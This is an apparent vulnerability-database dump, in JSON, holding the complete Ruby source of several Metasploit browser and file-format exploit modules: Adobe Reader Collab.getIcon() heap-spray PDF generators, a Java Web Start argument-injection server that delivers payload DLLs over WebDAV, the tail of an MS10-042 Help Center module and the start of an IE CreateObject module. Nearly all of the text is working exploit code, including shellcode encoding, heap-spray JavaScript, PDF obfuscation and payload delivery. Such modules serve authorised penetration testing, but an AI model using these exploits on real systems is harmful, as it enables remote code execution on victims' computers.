PROPFIND'\n }\n send_response(cli, '', headers)\n end\n\n def convert_to_char_code(str)\n return str.unpack('H*')[0].gsub(Regexp.new(\".{#{2}}\", nil, 'n')) { |s| s.hex.to_s + \",\" }.chop\n end\n #\n # PROPFIND requests sent by the WebDav Mini-Redirector\n #\n def process_propfind(cli, request)\n path = request.uri\n print_status(\"Received WebDAV PROPFIND request\")\n body = ''\n\n if (Regexp.new(Regexp.escape(@payload)+'$', true).match(path))\n 
# Response for the EXE\n print_status(\"Sending EXE multistatus for #{path} ...\")\n#<lp1:getcontentlength>45056</lp1:getcontentlength>\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag>\n<lp2:executable>F</lp2:executable>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n elsif (path =~ /\\.manifest$/i) or (path =~ /\\.config$/i) or (path =~ /\\.exe/i)\n print_status(\"Sending 404 for #{path} ...\")\n send_not_found(cli)\n return\n\n elsif (path =~ /\\/$/) or (not path.sub('/', '').index('/'))\n # Response for anything else (generally just /)\n print_status(\"Sending directory multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n else\n print_status(\"Sending 404 for #{path} ...\")\n send_not_found(cli)\n return\n end\n\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml'\n 
cli.send_response(resp)\n end\n\n def exploit\n @random_dir = rand_text_alpha(rand(2)+1)\n @asx_file\t= rand_text_alpha(rand(2)+1) + \".asx\"\n @start_help\t= rand_text_alpha(rand(2)+1) + \".html\"\n @payload\t= rand_text_alpha(rand(2)+1) + \".exe\"\n @img_file\t= rand_text_alpha(rand(2)+1) + \".gif\"\n\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\n end\n\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb"}, {"lastseen": "2020-10-06T03:16:24", "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Adobe Collab.getIcon() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_GETICON", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/pdf'\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. 
By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'MC',\n 'Didier Stevens <didier.stevens[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-0927' ],\n [ 'OSVDB', '53647' ],\n [ 'ZDI', '09-014' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # test results (on Windows XP SP3)\n # reader 7.0.5 - no trigger\n # reader 7.0.8 - no trigger\n # reader 7.0.9 - no trigger\n # reader 7.1.0 - no trigger\n # reader 7.1.1 - reported not vulnerable\n # reader 8.0.0 - works\n # reader 8.1.2 - works\n # reader 8.1.3 - reported not vulnerable\n # reader 9.0.0 - works\n # reader 9.1.0 - reported not vulnerable\n [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\n ],\n 'DisclosureDate' => 'Mar 24 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Make some nops\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Randomize variables\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n rand8 = rand_text_alpha(rand(100) + 1)\n rand9 = rand_text_alpha(rand(100) + 1)\n rand10 = rand_text_alpha(rand(100) + 1)\n rand11 = rand_text_alpha(rand(100) + 1)\n rand12 = rand_text_alpha(rand(100) + 1)\n\n script = %Q|\n var #{rand1} = unescape(\"#{shellcode}\");\n var #{rand2} =\"\";\n for 
(#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\n #{rand4} = #{rand2} + #{rand1};\n #{rand5} = unescape(\"#{nops}\");\n #{rand6} = 20;\n #{rand7} = #{rand6}+#{rand4}.length\n while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\n #{rand8} = #{rand5}.substring(0, #{rand7});\n #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\n while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\n #{rand10} = new Array();\n for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\n var #{rand12} = unescape(\"%0a\");\n while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\n #{rand12} = \"N.\"+#{rand12};\n Collab.getIcon(#{rand12});\n |\n\n # Create the pdf\n #pdf = make_pdf(script)\n pdf = create_pdf(script)\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_geticon.rb"}, {"lastseen": "2020-07-24T20:22:13", "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. 
By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.\n", "published": "2009-03-28T07:40:29", "type": "metasploit", "title": "Adobe Collab.getIcon() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_GETICON", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'MC',\n 'Didier Stevens <didier.stevens[at]gmail.com>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-0927' ],\n [ 'OSVDB', '53647' ],\n [ 'ZDI', '09-014' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-04.html']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # test results (on Windows XP SP3)\n # reader 7.0.5 - no trigger\n # reader 7.0.8 - no trigger\n # reader 7.0.9 - no trigger\n # reader 7.1.0 - no trigger\n # reader 7.1.1 - reported not vulnerable\n # reader 8.0.0 - works\n # reader 8.1.2 - works\n # reader 8.1.3 - reported not vulnerable\n # reader 9.0.0 - works\n # reader 9.1.0 - reported not vulnerable\n [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' 
} ],\n ],\n 'DisclosureDate' => 'Mar 24 2009',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n return if ((p = regenerate_payload(cli)) == nil)\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Make some nops\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Randomize variables\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n rand8 = rand_text_alpha(rand(100) + 1)\n rand9 = rand_text_alpha(rand(100) + 1)\n rand10 = rand_text_alpha(rand(100) + 1)\n rand11 = rand_text_alpha(rand(100) + 1)\n rand12 = rand_text_alpha(rand(100) + 1)\n randnop = rand_text_alpha(rand(100) + 1)\n\n script = %Q|\n var #{rand1} = unescape(\"#{shellcode}\");\n var #{rand2} =\"\";\n var #{randnop} = \"#{nops}\";\n for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{randnop}\");\n #{rand4} = #{rand2} + #{rand1};\n #{rand5} = unescape(#{randnop});\n #{rand6} = 20;\n #{rand7} = #{rand6}+#{rand4}.length\n while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\n #{rand8} = #{rand5}.substring(0, #{rand7});\n #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\n while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\n #{rand10} = new Array();\n for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\n var #{rand12} = unescape(\"%0a\");\n while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\n #{rand12} = \"N.\"+#{rand12};\n Collab.getIcon(#{rand12});\n |\n\n # Create the pdf\n pdf = make_pdf(script)\n\n print_status(\"Sending #{self.name}\")\n\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })\n\n 
handler(cli)\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n def make_pdf(js)\n\n xref = []\n eol = \"\\x0d\\x0a\"\n endobj = \"endobj\" << eol\n\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog/Outlines \") << io_ref(2) << n_obfu(\"/Pages \") << io_ref(3) << n_obfu(\"/OpenAction \") << io_ref(5) << \">>\" << endobj\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<</Type/Outlines/Count 0>>\") << endobj\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Kids[\") << io_ref(4) << n_obfu(\"]/Count 1>>\") << endobj\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3) << n_obfu(\"/MediaBox[0 0 612 792]>>\") << endobj\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << endobj\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n 
xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n pdf << \"trailer\" << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n pdf << \"%%EOF\" << eol\n\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_geticon.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T21:47:59", "description": "This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 \"are believed to be affected by this vulnerability.\" In order for this module to work, it must be ran as root on a server that does not serve SMB. 
Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n", "published": "2010-04-16T08:08:40", "type": "metasploit", "title": "Sun Java Web Start Plugin Command Line Argument Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0886", "CVE-2010-1423"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/JAVA_WS_ARGINJECT_ALTJVM", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection',\n 'Description' => %q{\n This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. 
Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'jduck',\n 'References' =>\n [\n [ 'CVE', '2010-0886' ],\n [ 'CVE', '2010-1423' ],\n [ 'OSVDB', '63648' ],\n [ 'BID', '39346' ],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],\n [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]\n ],\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => '',\n 'DisableNops' => true,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\"\n },\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Java Runtime on Windows x86',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 09 2010'\n ))\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on\", 80 ]),\n OptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ]),\n OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' 
])\n ])\n end\n\n\n def auto_target(cli, request)\n agent = request.headers['User-Agent']\n\n ret = nil\n #print_status(\"Agent: #{agent}\")\n # Check for MSIE and/or WebDAV redirector requests\n if agent =~ /(Windows NT (5|6)\\.(0|1|2)|MiniRedir\\/(5|6)\\.(0|1|2))/\n ret = targets[1]\n elsif agent =~ /MSIE (6|7|8)\\.0/\n ret = targets[1]\n else\n print_status(\"Unknown User-Agent #{agent}\")\n end\n\n ret\n end\n\n\n def on_request_uri(cli, request)\n\n # For this exploit, this does little besides ensures the user agent is a recognized one..\n mytarget = target\n if target.name == 'Automatic'\n mytarget = auto_target(cli, request)\n if (not mytarget)\n send_not_found(cli)\n return\n end\n end\n\n # Special case to process OPTIONS for /\n if (request.method == 'OPTIONS' and request.uri == '/')\n process_options(cli, request, mytarget)\n return\n end\n\n # Discard requests for ico files\n if (request.uri =~ /\\.ico$/i)\n send_not_found(cli)\n return\n end\n\n # If there is no subdirectory in the request, we need to redirect.\n if (request.uri == '/') or not (request.uri =~ /\\/([^\\/]+)\\//)\n if (request.uri == '/')\n subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'\n else\n subdir = request.uri + '/'\n end\n print_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\")\n send_redirect(cli, subdir)\n return\n else\n share_name = $1\n end\n\n # dispatch WebDAV requests based on method first\n case request.method\n when 'OPTIONS'\n process_options(cli, request, mytarget)\n\n when 'PROPFIND'\n process_propfind(cli, request, mytarget)\n\n when 'GET'\n process_get(cli, request, mytarget, share_name)\n\n when 'PUT'\n print_status(\"Sending 404 for PUT #{request.uri} ...\")\n send_not_found(cli)\n\n else\n print_error(\"Unexpected request method encountered: #{request.method}\")\n\n end\n\n end\n\n #\n # GET requests\n #\n def process_get(cli, request, target, share_name)\n\n print_status(\"Responding to \\\"GET 
#{request.uri}\\\" request\")\n # dispatch based on extension\n if (request.uri =~ /\\.dll$/i)\n #\n # DLL requests sent by IE and the WebDav Mini-Redirector\n #\n print_status(\"Sending DLL\")\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Generate a DLL based on the payload\n dll_data = generate_payload_dll({ :code => p.encoded })\n\n # Send it :)\n send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })\n\n else\n #\n # HTML requests sent by IE and Firefox\n #\n # This could probably use the Host header from the request\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n\n # Always prepare the UNC path, even if we dont use it for this request...\n if (datastore['UNCPATH'])\n unc = datastore['UNCPATH'].dup\n else\n unc = \"\\\\\\\\\" + my_host + \"\\\\\" + share_name\n end\n jnlp = \"-J-XXaltjvm=\" + unc + \" -Xnosplash \" + rand_text_alphanumeric(8+rand(8)) + \".jnlp\"\n docbase = rand_text_alphanumeric(8+rand(8))\n\n # Provide the corresponding HTML page...\n if (request.uri =~ /\\.shtml/i)\n print_status(\"Sending JS version HTML\")\n # Javascript version...\n var_str = rand_text_alpha(8+rand(8))\n var_obj = rand_text_alpha(8+rand(8))\n var_obj2 = rand_text_alpha(8+rand(8))\n var_obj3 = rand_text_alpha(8+rand(8))\n js_jnlp = \"http: \"\n js_jnlp << jnlp.dup.gsub(\"\\\\\", \"\\\\\\\\\\\\\\\\\") # jeez\n\n # The 8ad.. 
CLSID doesn't support the launch method ...\n #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'\n clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'\n html = %Q|<html>\n<body>Please wait...\n<script language=\"javascript\">\nvar #{var_str} = \"#{js_jnlp}\";\nif (window.navigator.appName == \"Microsoft Internet Explorer\") {\nvar #{var_obj} = document.createElement(\"OBJECT\");\n#{var_obj}.classid = \"clsid:#{clsid}\";\n#{var_obj}.launch(#{var_str});\n} else {\ntry {\nvar #{var_obj2} = document.createElement(\"OBJECT\");\n#{var_obj2}.type = \"application/npruntime-scriptable-plugin;deploymenttoolkit\";\ndocument.body.appendChild(#{var_obj2});\n#{var_obj2}.launch(#{var_str});\n} catch (e) {\nvar #{var_obj3} = document.createElement(\"OBJECT\");\n#{var_obj3}.type = \"application/java-deployment-toolkit\";\ndocument.body.appendChild(#{var_obj3});\n#{var_obj3}.launch(#{var_str});\n}\n}\n</script>\n</body>\n</html>\n|\n elsif (request.uri =~ /\\.htm/i)\n print_status(\"Sending non-JS version HTML\")\n clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ]\n clsid = clsids[rand(clsids.length)]\n html = %Q|<html>\n<body>Please wait...\n<object id=\"#{var_obj}\" classid=\"clsid:#{clsid}\"\nwidth=\"0\" height=\"0\">\n<PARAM name=\"launchjnlp\" value=\"#{jnlp}\">\n<PARAM name=\"docbase\" value=\"#{docbase}\">\n</object>\n<embed type=\"application/x-java-applet\"\nwidth=\"0\" height=\"0\"\nlaunchjnlp=\"#{jnlp}\"\ndocbase=\"#{docbase}\"\n/>\n</body>\n</html>\n|\n else\n print_status(\"Sending js detection HTML\")\n\n # NOTE: The JS version is preferred to the HTML version since it works on more JRE versions\n js_uri = rand_text_alphanumeric(8+rand(8)) + \".shtml\"\n no_js_uri = rand_text_alphanumeric(8+rand(8)) + \".htm\"\n\n html = %Q|<html>\n<head>\n<meta http-equiv=\"refresh\" content=\"2;#{no_js_uri}\" />\n</head>\n<body>\nPlease wait...\n<script language=\"javascript\">\ndocument.location = \"#{js_uri}\";\n</script>\n</body>\n</html>\n|\n # 
end of detection html\n end\n\n send_response_html(cli, html,\n {\n 'Content-Type' => 'text/html',\n 'Pragma' => 'no-cache'\n })\n end\n\n end\n\n #\n # OPTIONS requests sent by the WebDav Mini-Redirector\n #\n def process_options(cli, request, target)\n print_status(\"Responding to WebDAV \\\"OPTIONS #{request.uri}\\\" request\")\n headers = {\n #'DASL' => '<DAV:sql>',\n #'DAV' => '1, 2',\n 'Allow' => 'OPTIONS, GET, PROPFIND',\n 'Public' => 'OPTIONS, GET, PROPFIND'\n }\n send_response(cli, '', headers)\n end\n\n\n #\n # PROPFIND requests sent by the WebDav Mini-Redirector\n #\n def process_propfind(cli, request, target)\n path = request.uri\n print_status(\"Received WebDAV \\\"PROPFIND #{request.uri}\\\" request\")\n body = ''\n\n if (path =~ /\\.dll$/i)\n # Response for the DLL\n print_status(\"Sending DLL multistatus for #{path} ...\")\n#<lp1:getcontentlength>45056</lp1:getcontentlength>\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\">\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype/>\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag>\n<lp2:executable>F</lp2:executable>\n<D:lockdiscovery/>\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n elsif (path =~ /\\/$/) or (not path.sub('/', '').index('/'))\n # Response for anything else (generally just /)\n print_status(\"Sending directory multistatus for #{path} ...\")\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<D:multistatus xmlns:D=\"DAV:\">\n<D:response xmlns:lp1=\"DAV:\" 
xmlns:lp2=\"http://apache.org/dav/props/\">\n<D:href>#{path}</D:href>\n<D:propstat>\n<D:prop>\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag>\n<D:lockdiscovery/>\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\n</D:prop>\n<D:status>HTTP/1.1 200 OK</D:status>\n</D:propstat>\n</D:response>\n</D:multistatus>\n|\n\n else\n print_status(\"Sending 404 for #{path} ...\")\n send_not_found(cli)\n return\n\n end\n\n # send the response\n resp = create_response(207, \"Multi-Status\")\n resp.body = body\n resp['Content-Type'] = 'text/xml'\n cli.send_response(resp)\n end\n\n\n #\n # Make sure we're on the right port/path to support WebDAV\n #\n def exploit\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\n end\n\n super\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/java_ws_arginject_altjvm.rb"}, {"lastseen": "2020-05-23T03:50:22", "description": "This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.\n", "published": "2009-07-22T20:14:35", "type": "metasploit", "title": "MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003", "CVE-2006-4704"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CREATEOBJECT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include 
Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Seh\n include Msf::Exploit::EXE\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n # In badly misconfigured situations, IE7 and 8 could be vulnerable to\n # this, but by default they throw an ugly popup that stops all script\n # execution until the user deals with it and aborts everything if they\n # click \"no\". Not worth the risk of being unable to try more recent\n # exploits. Make sure service packs on top of 6.0 are considered less\n # than the max by setting to 6.1 (which doesn't really exist).\n :ua_maxver => \"6.1\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :method => [ 'CreateObject', 'GetObject' ],\n :classid =>\n [\n '{BD96C556-65A3-11D0-983A-00C04FC29E36}',\n '{BD96C556-65A3-11D0-983A-00C04FC29E30}',\n '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',\n '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',\n '{6414512B-B978-451D-A0D8-FCFDF33E833C}',\n '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',\n '{639F725F-1B2D-4831-A9FD-874847682010}',\n '{BA018599-1DB3-44f9-83B4-461454C84BF8}',\n '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',\n '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',\n 